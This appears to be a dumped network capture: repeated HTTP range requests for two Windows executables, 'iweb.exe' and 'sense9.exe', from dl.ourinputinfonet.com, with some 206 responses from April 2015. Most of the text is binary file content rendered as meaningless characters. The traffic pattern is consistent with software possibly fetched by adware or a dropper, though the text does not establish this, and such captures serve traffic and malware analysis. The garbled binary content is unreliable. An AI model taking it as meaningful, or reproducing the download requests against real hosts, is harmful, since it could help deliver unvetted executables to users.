....Z...m....tb...?.z .Wel.)g..I....~....\.C. u..@.>~q:..0 [<*.f
...a(..6.}.........-).gU.\......%.A..v>Ab^..W.K.....T.R.z..v...^/5.
.Q..dw.-i....IC.S.......E."5X.k....M..X.`Lz.a.U...^Ka}.X..I." ...r..ps
.....u.!. ..F.y.GlL.D..}......U.i....7&....)...d\# .a.....T..@.]k.K...
u)..m&a.. .v.,4M....u....78. .[...wV2...M....7./..._.........n...>7
u..q.l...$.........O?....~.?"OM.^.6Wg.,H.....b.r..qi..5..e....pk.C.)&g
t;..:...{........./!KRCm.#........T.j.n..>........ .J..z.&4$...f.T.
...F.{.......'..F.....n...s........../.kH...g..H'fv.../.#.i.3<..L..
....,..wi.]}...L.mG ..Y.lY...}.Ym.0[q:G]..}....H:...y}...i7V.....E..&l
t;H/[email protected]^..,......e&...a..h(g,.8K...}..1.nEnQ"F
....7..]!!..e..Y.K2C.....X)........'..7..i..rQ}.\.[.i..R $...>.
<<< skipped >>>

GET /spd/shopp/iweb.exe HTTP/1.1


Range: bytes=3500000-3749999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: dl.ourinputinfonet.com
Connection: Keep-Alive



u...J(s...m...m.z........dez{...].L.kL.$h....DC...ac.....cX...........
..Q"..gX}<0.Zv.}..~..,&,'.Q=_.#..x...mF^n..*..N.=..:........1......
Y.jn...`.u..&..........>....}6J....<..A.I...g.....y.%.h/N.....U.
......;.u..-.<....f.Y...).?.EA.....6V..&....Y.. .k.D.w..r..f.w..V.5
..<C....\......[; ....P...m... YfQ.....?.A .p.Pc..P.X.z...].p......
.M0..Js.a....' .,....'...J..1r..Z.O.i.a.H..].Q.#.5.e....7......3....|.
F....%.OSdzD1zsz.V9r..R.bpk.......r,..$.^h2..v..iPO.75...~..~s.wX..R..
(.....Sa.z./......}...............xw'..<.|?8Z.v'...c.{....2.nw.OE..
4.3*.b$Y5.....3...9<A..F.....{...7:Q.S!........p...P..6..fu.a]..k..
[email protected]...$.....w....~g.­.....D.........]l...~. ..[W.....
....[.Iyf6;.g*.r......*...xA.Ub.h*|.;[email protected] W..
j.|...^.....]b......c....Ym...V...=:^K....q....U..m......:`....Z...P..
...G..p.....;.P....}..s...i.Yr.`!O.o.?.L..^C{.!......M.5.}.C..0.jC..l|
.0.....<]B....-.B...J..7......q#L!.0...P/....Z62d.a. ...LE_>....
......s...i....0.....K_-.0..2..T.av2g*.r.....;P@V...}.GC.V....u.....&g
t;.*G...M....=....}.........w..(..x....!y.a.....e&...l........`...$.Es
.....#....Q..c...vL7..o.)..,.1O5(..xY!....^[email protected]...
......FE.$I.p.......%T..*....x...s..W...|G8....x...V.R..k...0..#P...p.
..s.>.E.....k........Q.h...&6....a.Pr.T....y]o.r......'....6......y
#..m................'[email protected] .19A.HL...p
GR..am4 ....m.....6.G.6../.x.'.. toYK..........Ey7..pc.}...#...b*w...m
.2J...^g..g.>"8~)0D.u..5.G.q.<j..?......%.....<q.J8.?Y.Y.
<<< skipped >>>

GET /spd/shopp/sense9.exe HTTP/1.1


Range: bytes=4750000-4999999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: dl.ourinputinfonet.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Sat, 18 Apr 2015 23:35:29 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1429364166"
Last-Modified: Sat, 18 Apr 2015 13:36:06 GMT
Cache-Control: max-age=51
Content-Length: 250000
Content-Range: bytes 4750000-4999999/11323780
Content-Type: application/x-msdownload
X-HW: 1429400129.dop010.am4.t,1429400129.cds060.am4.c
Content-Disposition: attachment; filename="sense9.exe"
...p..1...'..4B=9..va:A.......5X&..}XV.h.|..B._..%v:ze.d}....,....g.Q.
.j..~.j......:.Rh.....o."g........BZr...~.:B..1.......(..f9zf.......".
.|s..W..1..A.....>.{.sD..3...*:.m.95L....a..]...aU.3R8 .{.H.VX.f|h.
..~.3D.......<si..B.e.......1!X[[email protected]`)...o.>..!Z.4*........
K............EM..|I&H...@r|.L.....]....GM.k}.6......tg~......2X..xR.me
=)U.........w%\....t..,.D....B.8.'.<..}....J..$.._...../m..W....z.&
...Z=...&.H.k.>.0).n.Rjv.g.Os8o.=2....`.,.R..zV....]..H.p.M.R}.....
 .v.....P...X.7...6...E. j...0H$...s.!.y...3.......S........=.2.z....[
E.y. ...a.._......*.2."=.PB.. n .%E.....k.....7.`...|c.4v.&fz.>.G.6
.6d.b[A.^..K.w...W8e....!)a.....9.da=.Z..Xj.. ...c@..__.DH...E.T...F..
,...i9..F...A1....a6..Z.6.....C%...a.U...N......2B..G...`..=.)...T./.f
.......7M..n.$....y.o!o.........Bx".\....>...,:[email protected].. c..r.
tcB.er.W............gQ.v\.....h^.n.'........I......D18.p.....Mg..=[A.(
.M.'.9.F-i....o.>A.9....s...:...a..:...r*. ..8f.Pc.....[.P....!.-..
...9#;...9"p.[.L.,..7.Yy......^.p.....<1......6B.T....w.C...A...e..
W..i....__.......f........~.....t.Y.......Qe...tF?.-....=.....ix..t..b
..Y.O3...i..y....u.[$......`........._...oy.....[&...?z..G,.D.j...(=..
8Q*/>.v...n].,r...O%....;m.. .....|.S...ZH.*...I.....).K..R..u.n.~.
...]8P.t..qf....6Q.....C..WN.........o.?=9.........~H..%..f.7.<....
[email protected] .esU.~.|F.%.sq`.o...$.@>P...7.Xev....../.1..#.......W.
....d........vFh...P.Vee....I......v.JS..^J...E...(...G......"..x"y...
[email protected]...? `4.(.......9
<<< skipped >>>

GET /spd/shopp/sense9.exe HTTP/1.1


Range: bytes=5000000-5249999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: dl.ourinputinfonet.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Sat, 18 Apr 2015 23:35:29 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1429364166"
Last-Modified: Sat, 18 Apr 2015 13:36:06 GMT
Cache-Control: max-age=51
Content-Length: 250000
Content-Range: bytes 5000000-5249999/11323780
Content-Type: application/x-msdownload
X-HW: 1429400130.dop010.am4.t,1429400129.cds060.am4.c
Content-Disposition: attachment; filename="sense9.exe"
$.t.D...!..m..N....so.......q.Y....6'.F...9:.._e....Z.-..U|.\..3.}....
r....Z3.'T....}S>...Tm...7......L.F..'..U..&>.9"[email protected]. 
[email protected].{.....i~y...-....@I..=.<W..^
..O........ ..u.k....Z.}[email protected]...\....9cH"6T ....)..z.Ad'....
..cG....m....7..Y.....d......K.XY. .......jF...|P2...;....\.... %j....
j..:.F`>*._.Qv&...sB....4.F.t.WKq|...l...;.>0..f"..'8.,v..$'.XAM
.z"......I[-.<.3 ..5?.-=f...#.a>.U^..Z........Q.^<..Y.R...I].
..*..X.lB....F.5.(.6.8...t.....W.p.....M#X.t....>[email protected]
.2...J..x.8.............2..rb...0..U6....(...........a.....7.*...ap..I
,.s..3..dJ.X..GQ..=i....N.u6q$&...z&......f*..\...Cf<.....'i.....E.
C.6.x.!.9.....]WvI....&T..k5L....z..1..W$.wL..Q.hn"LwvM..../../_.q.Z6|
i$.^i..6jt..R...u...\....6..JT.....y...?..:O...v ............6.9......
0.&.j...3.- 6t.dv..!:[email protected]\_. -CWj..<..%.....puj
..[.....b...... Q..d....5[...3..w...........a.0VIx...d$.~...{ZR..'..R.
...].uF.Pzhq...S.i-.U|\.g.......9.....*.0.sS.f.9.......J...6....|.F.=R
..p.TV.W......fl...$#9w}..>cU.;..!.....T...G..8/.X...q.....U.|M..#h
F.'?ET...Q.n9.}..a%{o .N..ty.g.....nO.a..ZpT.2..E=.s......0.w....`..&.
Wo...3....R ..h..s{6(.a...E..9.....q....-....|...z..=.n...#/../.......
|...5...x..|....\...M.`M...j.0%.....l*]....e/...(].~.`..y..Q..z.A....*
.\.".!8..stP:G...X...6o....[.6p>.... ..a}GP..,[email protected]...
...a?.a..G.........Q..Od.7.=...JKF..<.5..&.}........SKdE..z..).....
.hJ.......b.n.E.P...eEsy.2.C.3.]...(....s1..4c.. .ra.x..].^..t....
<<< skipped >>>

GET /spd/shopp/sense9.exe HTTP/1.1


Range: bytes=5750000-5999999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: dl.ourinputinfonet.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Sat, 18 Apr 2015 23:35:30 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1429364166"
Last-Modified: Sat, 18 Apr 2015 13:36:06 GMT
Cache-Control: max-age=50
Content-Length: 250000
Content-Range: bytes 5750000-5999999/11323780
Content-Type: application/x-msdownload
X-HW: 1429400130.dop010.am4.t,1429400130.cds060.am4.c
Content-Disposition: attachment; filename="sense9.exe"
).....:s.#...z_.....SS......*%g.{.....Y:...7#..45[.Z.n......{vi.=qU|.U
./....6^[email protected]..^.....xt..'YO...u.o...
.F.';9....\*..w...a..Y...."...>...y.vi...H.L~..b.Q...B.Flr.S Yu.Z}f
r......L............9.(.IT`$........@?..l...9.........{.,...y:fj.....3
...u%!.(.....H............0..O..^..D.>e....8....3c........h.NV.....
I..A..8Zd.H._...I.z.W..)..0.%......e......D*.........8...o.61. w....pl
..h...1..}.]........p.AK.<P...h...;.........!.........-.....,...I..
....H.......%.B..{..~..P..s_.).%vL...*... ...3..l(.....3J.ef.P.*..@.(.
,...O&q.HB...,t...<...U..<........F.a.B../..!..)...). ..8.:...y(
<.c.. #=)Z&Y.#.]a..dl;....G........y.v.g.R1$....-.>2 ..9.S.d o.b
.Gb..u{MZ..}....{...\.q....C..Hh.K~8{..dL.......4*........fq....'i..t.
$2....s..gI.d.*z.?Y........E.....Kv....$.Gf...... K..Bb.s...3.N...rK..
...y.../*.... .V...btfL4b.....U.....'....Ia[....].G.a.,....?g..._..gbf
L.f.. .7*.X.....&.....l^Kw&..0%....m.:.....~G.>]&...h..[..|.S..]...
......F..........W.=.]........J...=..P....8.[.Az.w...5N|Au......I.....
_.RI.f...Bp.^x.c.c.....{..x..$....K....qYW.....ntlL..c.#.(qez..ao.....
.... Pq.......%.B.J.>=....W....L...Y....5....Rv.t^@l.H.5..(...vYO$ 
..6.?8qk...2I.k... g.y.....(..W. Q..........3..rR.r.<U..vPQ.-6l8..P
J...p..Wf........S..i.Q..79.._.....R.(b^.t.=%.C MZ.l.a .\.v%3-.......j
.}h.........(f...LuI....I/fk...3..6...p.a..^............h.....%sm.....
Rg..;\.o[.J..s,1.............N..,...\1....}...)...0....D2......7..p.J.
Y.k4u..i...h2.. [email protected]}...............$$....x.c..w..
<<< skipped >>>

GET /spd/shopp/sense9.exe HTTP/1.1


Range: bytes=6250000-6499999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: dl.ourinputinfonet.com
Connection: Keep-Alive



.{..Yw...M ................^.P.? .$..&..._..N......(......}..Fk$...J.S
.4.Dq....v..r...A...^m!.....5.U..Tw.L....I *F..W{J.......mne8..H..H...
.........>...J...^R.). ....\(...Iq......aq...1.,....a.H.B,...... ..
...j.....v...x.t......]tBv~$ ..7..F..RH/rw.ztF......i..5.....5.......:
..x[.!.1..x3Q...g.|......&.?.,..q................Q\...*.~\..t...Z...W.
..~........-.......=..X.?f.I:C{.B.m.....5.. .,mP.l....HU.tB.e..ML..ldU
...e...=A/.vk.T..'zN..%^.S....Y....6m:5...}.H.... M.`1,.H.'K.^2...o..:
...I..T:.........}..N.q../..E................RH.6..<^f....z. ).W(..
.. .._.....|..E,!.....2z:i....*[email protected]....!'c.
.../B...6..q....<..Q..6......6si..l.;.{.H.......P.].O]......N..=OD.
...D.....k..)........3R}.>.f......^%..Wb...}.....w........ /....$.y
R.zY.4PD....... .8)....s|...v.._*.1M.....]...(,.B.R...... ". F.>.VC
n,.a!..m..TT.H..H.(5/..7.B-.....d....*A.....@4`&m.. ....c.............
[email protected].#...^........5..H\J..[...-......ZuaR]I>..w...4&i....
a..Rw...a...v....&k.,FF.l$....V..DR#.d......q/w.T....v..3r......."},..
.VE7._.s..$....dmi$..v.O......._..q.W..P.F^.%flgi.:.o1.oIm...........b
I.G./.....}....6........4~...3..3.:..x.....].y.vHb=....4G..I..P..lC.F.
.K*...}...-..[.lw{&B.......s.?3~....h.&..,4r....Y....U%.D...(..;.....:
,"r.C.8..U.......".m..... -..G........E...8.....S.C.J'.Hk|;l.w.....#..
..K-. cI..f...qy....... .....:___...X.k...~..b.;...S......[].$K...vJj.
O....7...' ...4...M.Z~.......B........(f_..O,......_.(...#.A...I.r.p.Z
[k.~.d....gs5....6kO..xK...5*...2.).. 1&....L..E.......:=C.M......
<<< skipped >>>

GET /spd/shopp/sense9.exe HTTP/1.1


Range: bytes=6750000-6999999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: dl.ourinputinfonet.com
Connection: Keep-Alive



......F5..... I..S.JrY.....N}..nM[.-.p.K..!...b4.}..8AX....S..d..".:..
.h9.%..`qh.E......U.y.....T.....l..FD.....e..`(.......]C.*..........8.
O..........`......J....>[email protected].......`'w.(.!
.y...."{..$.(.e.._..Cy.m.JE.^...;g/*j<....,.l...w..m.|}JS.....=....
q.V.H..B......>..X..x..%!..N..O. 3|........L..H.b.dH>P...R..#.-D
....5....\2..o..#].. ........s<)...."(6.........6.T3..32?.=.]...z..
......q.*.U.S.....C..w}......}....n....D^..W..$....|s.O.qI.......~D2=M
.....2.]y...Djr..j.\.9..y.0.`}..aE.0.L..l...."y.....rP}G5..b.S_..F.0,.
.....JRR.`..{. ................Je.cY...F........[.9.P....v...^t{..c...
.....g.W.0.....`.........D....GSj....;..i..<... .N%.........e`]....
..).4....A..P0'....XJD.....K8....|.iS`....Dht..1io.v..........0K....6X
.8...y/H..........X6..:[email protected]..*.....][email protected]
......=x...$..[l...^k..A.g_.'......v..La.M.~'-[?.......-....a.1.......
.....O#.....8..ox..2.w.......9....9[........l.....%.)........Fd....vL%
.F7.A..r.w Y.....G..t.....6.........G.gN..B=&X...l........Z...?.k..?.j
....G...d$.61..`.......dZ..v..........IQ........i..)..v....&4_<?..E
.t.g-`*..".Z.........h...k.b...E.1......"..GC.F...Q[-..Q.7\.g.C.......
.....'......YP.\...(....^...MD......t.|.C.y@.%o6j..G.G.l.B..Tb-.#5.4..
..C..P.<GW..D.0..f......`T........{...[.....(k..ZY>..F.....H...R
.q2[..B.......&....C.4.e..|..Z.;........[....G/[....yx.........U .....
...X.....pV../.I.XQ. ..\..&..o-....48H.n.0.,...y...~.....i`;Jb... .L.j
 l...K..4......,`.[**9.......6yS..=.'G...B...Y......Uk...^h.]-..jo
<<< skipped >>>

GET /spd/shopp/iweb.exe HTTP/1.1


Range: bytes=5750000-5999999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: dl.ourinputinfonet.com
Connection: Keep-Alive

GET /spd/shopp/sense9.exe HTTP/1.1
Range: bytes=7000000-7249999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: dl.ourinputinfonet.com
Connection: Keep-Alive

GET /spd/shopp/sense9.exe HTTP/1.1
Range: bytes=7750000-7999999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: dl.ourinputinfonet.com
Connection: Keep-Alive



ap`HT.Z.._...GI.....J..-D..j.1....W}Y. ..({..r."5....\gKG.\/D:..6.....
f.j..........U}C..b...FA$%..&......... ....gQ..))..|;.;[email protected] 
.}c..[~.b. ......{o.ivg.....u}Q.......%....wM."a..!..$?<....2.}.[EK
..KV..f....$../j/..t.......]S.A'...^N;".er.U.#.{..:.......!.......E...
. ....b........MEB:..7'..d.......Wbk.j....G....j.s....f..# .0.Jj.(...H
.e.[.....T.S.kr.:0.BX...g.F.. ...q......|...*a.....-....71A.'...K.=.).
%.<..<..E~....;...3h.........2..6.J}.\3....A;vf.NX..o..."....v).
.......|,..An...mH...'}H.........h...fg...6. ....J..I}....#...K.s.|..Q
.7.3.Q..<.p.w....L...kr#./......nK...`n......... 6..[...2z..j.U...(
}..I..).s....R.Mh.(..x..!.cEWA`.R..f..$J......M.".C.<.szr...J......
O.*5..`..%...1.....D.%..:.......4.-|.d....9...a.0....[.W.QE......^....
..b;.q}..n.p>...=S......4.....^A5..:]W.Z.&>.............W.......
.....O.m$...p(=P.....2...b*-..N.o...............Y...$1....,f.t..=.l.I.
..*.;..._....F...?..{.. \..>....1C...trK..>.*....R.m...>..?c&
/.-..A..Y?.1....KE...6. [email protected]..>..${.Q...c...9....d..q.t..?1.
.....Vb.....i.7f.. \_r...5....].v.._]..g..}.X;...c......./..05.:.$s ..
\.......ng.........L...GX......<...K%.fy..6.o.~.......E.!_........s
HO&j.....0......`.<..n.W.QM&.d.E.|[email protected].=....4.7d.....-...s..S...
...<..1Mx...s%.mW......;3....p..y..... .]..<z..j....-..]4K.f...D
.......7...~A%]....2!W...;=...........K................[.[....Q..wr...
h....n...b?...#..|k.{|...v.N.a....w..-....7.9.....YEhIb.%...}GR..k.2.$
G.~....a.v.{..'.z,I.&.j43.[...Y..<.*.~......9...U.?...!^..L....
<<< skipped >>>

GET /spd/shopp/sense9.exe HTTP/1.1


Range: bytes=8250000-8499999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: dl.ourinputinfonet.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Sat, 18 Apr 2015 23:35:32 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1429364166"
Last-Modified: Sat, 18 Apr 2015 13:36:06 GMT
Cache-Control: max-age=48
Content-Length: 250000
Content-Range: bytes 8250000-8499999/11323780
Content-Type: application/x-msdownload
X-HW: 1429400132.dop010.am4.t,1429400132.cds060.am4.c
Content-Disposition: attachment; filename="sense9.exe"
.}.....J.f..._..|....OF^.3...%......D..y...Y.p...9._......vW.kj,>K.
B.? .d....t.q..a..L.....^B...g.5.........c.........CD.Sp.U.xQ.....O3.w
m.L..s........7.)....)...U..'.Fqp....c%...q. .....Xo1l.NC...6.T}..-...
F2.52>,.....y.\.._.J..z...l...BX....z0R..<"%...RX5.......\...%#.
......{...|]....,V......U.~5...\!.^..Et...'...4.ams.B...i.s....A5C`...
.(.axD..3}..K(.kIJhI(.T4.j....B.(.".\..zPU..T.n......*N.y...X.O...D...
w,.XEO6.b..L.X*DW.......:2}W..dI.7(A.ntH.v.. ......)#..R7....."..JN...
...B.z~K.;.....##.=...A..e-..s..A.v...9.z..|.$~.Q2.ZAd)...xv.Nt.5M.{..
6A...#i...qn.2..g..H....R(.T..,.O7..G.N.....]....hnD* .?;.y_&~.9....Q.
.PD...U..L...:.M..P.!.c......HG..".V...'.vV.KsG.<..eZ>.....L.P.#
N.....^>.......xU..zJ.i...k....1.......S0....v7.54.0...<U.......
.g ..6....J.|.al..m...r.......=jK....F{......&7#.-....X5...cC.9(.%)...
X.&}..L..JG(eY.(.....k..,...0|.-yE..y.H..%o.|V.W....p.?.l..CW..u..P.-.
H.j..&..h0}.J]......K.....D.."...g..!?q....K....{a}.....CEY..N...[J[- 
n.....}..}....w.....\...,h.*.......e.V.n....|.J..@....}-...D^./)G.H..\
QL..A.........4g...`..3.x....... .......DnR..........#....ho....Q....:
>[email protected](.4.6~.........XZ....Oe.K.k.'.^.......7'i .,..oX
.*A.J.e./u..&.A..b).T.(..`..9......e$.q.....>..........~....,Z..q..
7..[k..o..S.U..I][email protected].'B..y..,[email protected]
.:d....:8...P*.MX}........XQ_..=.hi..?......$.....J.:..$.x........*.d.
......O.......$...X..C.q..../.v...&.d.ahK..'r.W........g. .i"V  ?I...Y
.;..zFY.mmM..P......:h........2c...4.Io..4....IZ~.r.m.(.iT../.C^&$
<<< skipped >>>

GET /spd/shopp/iweb.exe HTTP/1.1


Range: bytes=7250000-7499999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: dl.ourinputinfonet.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Sat, 18 Apr 2015 23:35:32 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1429363844"
Last-Modified: Sat, 18 Apr 2015 13:30:44 GMT
Cache-Control: max-age=3327
Content-Length: 250000
Content-Range: bytes 7250000-7499999/11194736
Content-Type: application/x-msdownload
X-HW: 1429400132.dop010.am4.t,1429400132.cds051.am4.c
Content-Disposition: attachment; filename="iweb.exe"
z*..e.q.7.Y/P.i7.[...`z(V...[...[.,.....0-4h.`.>.G..c.......y.5....
teU ..&.j.7&F...J.}l....F..6....,.s..;v4........ .._(.so....a..9:..(..
IV.q.J>....4......eL.g%'.."D.1g{S..........2.|m.q#...?......*i....l
8....t..... u.`.SQ.Z9.z....R0...~s..b..U.kp.......M.....7..6...?.O.(N;
..<U.9d'%"...Y...]Td..E...D.0.k...r)...%...NC...s\./...&.|g...n3..2
h.F7Y`B.....V4:@..O,t...J..S04UE.y\. :..uk...|.1C.P..{(I...c1........T
z.f.....B).....,N...Q.n...&...Kx...Qn=...... .....i.F. .o.. >8....Y
..(-O:7...oi<.9.z.....k .*.q....v.20r\4W...$1.e.Z.zt...............
uK..8.6.1../[email protected]\.g....;......kf$.: ..A5. .
.D....._. '.tus..9!}-P;.X...)...T..e....W).^p...`]...y........0..(..x.
`-.7.W3......<..Ii9.-/.....}.6.ZU.....Ld.l...7..fn..g....B ........
..WX..y.<.n..............R........d..R .H..cH.....l...S...a.C......
7.V...D.....IYL..z.X....~ ..t..I..b./....<.....0.O\....S.....C...;_
h/6.z..7._.Y.nj_...X.U...U.........w.A...g........j(....}.?X.5./.Ow.dw
.....i...D..xd.....PA,..C....Mi..L ....MC.~bf|...g.@D`..*T.rl.tgO|k...
B.S...?^.........6.u.............w.......X]"..;V#.........a..ghm(..7..
.1..E .........|[email protected].....?...V..#...v9"s.|3e...24....l...$..5...:
y.E.d.....b..,n..A....m..F......^.......(K.5.M..\...bU^.v...!.{.m5..9.
...8QG."..w.=........>.j{|U......(..4.M!.........]...Z%.......;...H
'H.m..;.....K.QNF..k......q$.x..`...i...]pT.)..VM...$.wu...K.24z.Rt_j1
....M..~'.V.;........-....y...o.tGZ!x..g.R...5/7.r......X..=R.]5....!S
.W....#.K....].k.C.H..:.!...&.t......4....=...P....Pn...6F...af.[.
<<< skipped >>>

GET /spd/shopp/sense9.exe HTTP/1.1


Range: bytes=8750000-8999999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: dl.ourinputinfonet.com
Connection: Keep-Alive



}y......Nl<...fn.............]....%..>_..~.6N....xg..B...A..m.0.
.F'U.......2d...q...~..Y.)....>.q/r .....P%0VT.3.u.=.o'..C.|;..6{.~
Hj.{t..4....."k*|....I..o......4.~...E..{_i....~wt^.j.G.hCH........y..
.T#........ #...$.>../S.Z.p.9uM"..R...8...Q_......h..G......x]|2...
/..L......f...P7.;.......K.>:!.-."...>-'&.m;...$.....0.%.\/Z..T.
...w.......$%........x*..T.L. .....0.B.............T..._*.....E2cq._1.
K.v....i0q...jg....Y......0m-..O~..a....9_......<..l;.ew..?.......^
fA.^.v{.....[....wL..l.2.Pv.!..uE..POFo U....`.g.J.S.P.(.....n...l0.Z.
^..06..>b,...d..%....C.zQ...$U...#.NIM...\q.........L./.cR.U.(Y,...
...~..H...}7u2.7,bU......S.1 .F0..|.....E4.O..2q/,..Cz..u.G.......(../
U..(...e.q.f.~N.,20....._...V...0.y..;...[oD..K."P..1 ..rp...{....V..g
.4.y:PB&d6...L..g.....gm'.6d....R.RX*..Rg..X"*77.e...%,.......Z.p..>
;<MHz.8[...*U.....L..9..o. J........0.....q.u......e.8q.....6..;...
T...6.&. .yH.X....{H.[...(..Q ......&|..f.E.N.......5y<K}_.O5_..r..
.L.l..TL..{..._.>(C.......H..it..)L...`P#...S{....k.N...dY...%...zq
.....y.##.:%..a.U........LCf..9........sJ..s.O.q......Q........K..U.#.
..9o......6(..o.mq=f..>aV..../D{.^..~..`J".".z....(.'W[.W#......Q..
Pt.ra..C...l...(.}....'..(9I5..e...&.."%..4..k..Q..j......2.EOSK.{....
..)w......e.7z?.g[J7......]............9....2;.l'd$.......K.........&g
t; ........t............I....J.Z.........B.rV..$y|..\..ZsP...c...5.7..
>8...`|[email protected]./[email protected](....T..P..O.(
C....|....s...^....%..\....Ai.s.....O........QA..Ww.6...e.S!Y.....
<<< skipped >>>

GET /spd/shopp/sense9.exe HTTP/1.1


Range: bytes=9000000-9249999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: dl.ourinputinfonet.com
Connection: Keep-Alive

GET /spd/shopp/iweb.exe HTTP/1.1
Range: bytes=8250000-8499999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: dl.ourinputinfonet.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Sat, 18 Apr 2015 23:35:32 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1429363844"
Last-Modified: Sat, 18 Apr 2015 13:30:44 GMT
Cache-Control: max-age=3327
Content-Length: 250000
Content-Range: bytes 8250000-8499999/11194736
Content-Type: application/x-msdownload
X-HW: 1429400133.dop010.am4.t,1429400132.cds051.am4.c
Content-Disposition: attachment; filename="iweb.exe"
.nQ.;5.o./!...3....8...".*.....9-.[s....0.......zIi..)....d..#S..*....
.....7.A.\..,T..L..m...A.XA..2....r......5BNc...&._.........L,;.O.....
g...&t...g....<.u..mc?....t.Bx....:...".......J[....Fl...I0*..o.m.)
ax....".L.d1.P.R|.....p..fS...an..S..L...{A).7.n.qKiI../{K.....W..k.nH
.e0.~..~o.M...N....:wuu..).K.P..G.D....&......... ..E.U........1......
jq.n2..I.......9...R.R..m..........P..iJ.>].....hbS.f...b.XU`......
..W..p}E]Q3...`R8..W.....9.....|.(}.U.....z.0T#qGh..j.ib_..w.J.......h
[.........k^...${..).F.......M...-.d.<.wS...:..Z .Q&..}......x[.)&_
...;.....0...r..Z.hU....f.1XSuu..Y.AH..#q .b..[..Ms.8..ZI...P...Y>.
9.32.....b.W.M....{fv.) p.l..0";..[...m..d....K.....PZ...........j$..Q
...z....9M...........v....g.>...6...yJ...r.>{Zw..T....G.....`...
9.(~..?..7Y..Ve....../..z.d.3]...w.q....:.s .).....G.C.?.7h.h.....s...
.~.*.a....W.#. .s|.A.....,(..$4..$.V.....`]s3..z..i#m.......w.Q..Fb2..
(...\.qQ.L......v.C.[..BV..6.Eor.....N.iY.FM$...........diM.h..#.f\...
)......|.7.(d.,..n.{.M.n|.8.2U./U..n.<u...v... _.!.[M...2#.........
A..........t.z....7..f....v....D..Y.'.Bq~.EA..T~>cH'...............
..J.M(.Uyt.....]..._.........K..[.. .....8.!...rz..d..........v..x.@..
,b......QfE....G.[[email protected](.w
T}....."s6...o....j...kvvS...v.g...x3...J_,>>....u.{R.P..B.....V
i.e9.(....F....^......m.....L.U.aQ.F.A.!..e..q.W...8.E..U>....vB.4.
S.B.l......:...fc/8!9.....,?.......6...`h\]<6...G.ez?...?uV ...oI..
..;r..t..B.5V.x.Ok<0\..:nx...@(J..@*IR2T@...[....F..u..Nb....n.
<<< skipped >>>

GET /spd/shopp/sense9.exe HTTP/1.1


Range: bytes=9500000-9749999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: dl.ourinputinfonet.com
Connection: Keep-Alive

GET /spd/shopp/sense9.exe HTTP/1.1
Range: bytes=10000000-10249999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: dl.ourinputinfonet.com
Connection: Keep-Alive



.,.....}..om.;.N.s0ir..Jwo.M.Mu..Bw..q_...tn..~.1ElNs...._.:....m....`
a...|.d9......@..... ...Q......"-.&........4\q..B!..".(._.......iB&.c.
...........pmf......... ...cl.{L..Q%c.8........./...................(=
:K.$.cQ.i..y.f.........8.J......~...}l...c.!.u.'F.S.....3x.O..........
...X...=...IM.}^.8~.....R.A.77L.hH.k..W....s.8...W..#v_......49...oR..
..(v...2..c....^...Y.q........h.x...w..K.5.Ms.....4.....(X....T#.,i...
..l.^P._.kaN...O......!...A.8L.".o#>[email protected]\...n..,...
'.....;S._T...i.fE..........%d.M..Hpd.).Z....  r}.R.!).....i.4F....,W.
[email protected].;b...d=*@.j.^.......o...UP...........>Q..
....#.H`.. .?..rc^N#..k.=|..15H.bE...P......F{...3..Ow.[.....2.IX&.G..
.:..^.1...' ....B..=.ZT{fA.G..zO...$..~.._..f$........A6..P.C5..).io_d
?.f...9i...g"...ZjV...L.......N.......AHX..gk....7b... ....px[....v...
....:m...........(..2.MD...... . [email protected]..(.0......
...8}[email protected].......^....i;IL..K....O.h.g.P.=..o..&y....Ax*.V
..\kw...k.J..D...,8....P...D7c....-..._W.VR.1.Bmn.*U...9.O0...r...3...
...e........U.......Qn..._..W...E...8.4Oc........tb........>..]...C
....\0.$....-........M.V;...*i./&..6.._...PO....H.....mio.F...h..*{. .
......6..F..U.Ee.........N.)...Q..{.l.7....[....F.TY.z....6B....-.....
W!.,.7...$....pJ....e..*...~f.Y.L......[....&[$w.....i.{!.%....%.....g
l....O.W.. .{.......\d~..4,..C.c0...A ...F"J...w...=..^..t.M..........
../._c.....9...NR......H..J.a.q4..fI.Y.9UE.......o.............!....)o
G4......h..-._b.....317....uo.@..'...Q........}<.3.({.g..a.l.O.
<<< skipped >>>

GET /spd/shopp/sense9.exe HTTP/1.1


